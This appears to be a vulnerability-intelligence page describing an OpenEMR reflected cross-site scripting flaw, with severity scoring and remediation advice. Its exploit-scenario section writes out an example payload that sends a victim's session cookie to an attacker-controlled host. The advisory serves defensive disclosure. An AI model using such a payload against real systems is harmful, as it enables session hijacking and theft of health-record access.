Skip to main content

Openemr CVE-2026-33911

MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-03-25 GitHub_M
XSS Openemr
5.4
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
5.4 MEDIUM
AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
Required
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
None

Lifecycle Timeline

2
Analysis Generated
Mar 25, 2026 - 23:02 vuln.today
CVE Published
Mar 25, 2026 - 22:44 nvd
MEDIUM 5.4

DescriptionGitHub Advisory

OpenEMR is a free and open source electronic health records and medical practice management application. Prior to version 8.0.0.3, the POST parameter title is reflected back in a JSON response built with json_encode(). Because the response is served with a text/html Content-Type, the browser interprets injected HTML/script tags rather than treating the output as JSON. An authenticated attacker can craft a request that executes arbitrary JavaScript in a victim's session. Version 8.0.0.3 contains a fix.

AnalysisAI

This is a stored/reflected cross-site scripting (XSS) vulnerability in OpenEMR versions prior to 8.0.0.3 where the POST parameter 'title' is improperly encoded in JSON responses but served with a text/html Content-Type header, causing browsers to execute injected JavaScript rather than treat the output as data. An authenticated attacker can craft a malicious request to execute arbitrary JavaScript in a victim's session, potentially leading to session hijacking, credential theft, or unauthorized actions within the electronic health records system. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Vulnerability AssessmentAI

Risk Assessment The CVSS v3.1 vector (AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N) indicates moderate severity with several mitigating factors: network accessibility is unrestricted, attack complexity is low, but the vulnerability requires prior authentication (PR:L) and user interaction (UI:R), and causes only confidentiality and integrity impacts at limited scope. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An authenticated attacker with access to the OpenEMR system crafts a malicious POST request containing JavaScript code in the 'title' parameter (e.g., title='<img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">'). When a victim user (such as an administrator or clinician) is tricked into viewing or submitting this payload through a phishing email or social engineering, the JSON response is rendered as HTML by the browser, triggering the onerror handler and exfiltrating the victim's session cookie to an attacker-controlled server. …
Remediation Upgrade OpenEMR to version 8.0.0.3 or later immediately, as confirmed by the vendor release at https://github.com/openemr/openemr/releases/tag/v8_0_0_3. … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Recommended ActionAI

Within 30 days: Identify affected systems and apply vendor patches as part of regular patch cycle. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-33911 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy